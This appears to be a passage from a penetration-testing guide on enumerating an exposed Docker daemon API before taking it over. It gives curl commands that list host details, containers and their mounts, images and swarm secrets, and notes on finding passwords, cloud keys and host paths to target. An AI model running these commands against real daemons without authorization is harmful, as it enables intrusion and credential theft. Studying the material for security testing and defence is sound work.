Before taking over, read the daemon. The API inventories everything the engine manages, which maps the host and often hands over credentials directly (environment variables, mounted secrets, swarm secrets).
H=tcp://<host>:2375
curl -s $H/info | jq '{Name,ServerVersion,OperatingSystem,Swarm}'
curl -s $H/containers/json?all=1 | jq '.[].Names,.[].Mounts'
curl -s $H/images/json | jq '.[].RepoTags'
curl -s $H/secrets | jq '.[].Spec.Name' # swarm secrets (names)
Exploitation notes#
- Container
EnvandMountsroutinely expose database passwords, cloud keys, and host paths worth targeting. - A daemon in a Swarm exposes service and secret metadata, and often the manager role, widening the blast radius to the cluster.
- Enumeration is read-only and quiet; use it to pick the best container or mount before the noisy takeover step.